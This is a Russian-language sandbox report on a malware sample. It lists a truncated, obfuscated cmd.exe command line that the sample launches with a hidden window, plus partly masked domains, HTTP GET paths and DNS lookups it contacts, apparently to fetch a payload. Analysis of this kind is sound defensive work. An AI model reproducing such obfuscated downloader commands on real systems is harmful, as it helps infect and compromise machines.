Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %tVcpnHNFYFMvAqI%=UirQUCCSWOfrlw&&set %oHJudSz%=owe^r^s&&set %BzITTvWzlCJhhmz%=lXMqDNh&&set %HDRtnhDavGCPGI%=p&...
Сетевая активность
Подключается к
- 'sk####gomovers.com':80
- 'se######ssencamping-ried.at':80
TCP
Запросы HTTP GET
- http://www.sk####gomovers.com/ohipVb/
- http://ww##.##lcargomovers.com/ohipVb/?us#####################
- http://www.se######ssencamping-ried.at/gAvdav/
UDP
- DNS ASK sk####gomovers.com
- DNS ASK ww##.##lcargomovers.com
- DNS ASK fo###.qual.me
- DNS ASK mo#.##roimteplo.ru
- DNS ASK pa######dvogados.blog.br
- DNS ASK se######ssencamping-ried.at
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %tVcpnHNFYFMvAqI%=UirQUCCSWOfrlw&&set %oHJudSz%=owe^r^s&&set %BzITTvWzlCJhhmz%=lXMqDNh&&set %HDRtnhDavGCPGI%=p&...' (со скрытым окном)
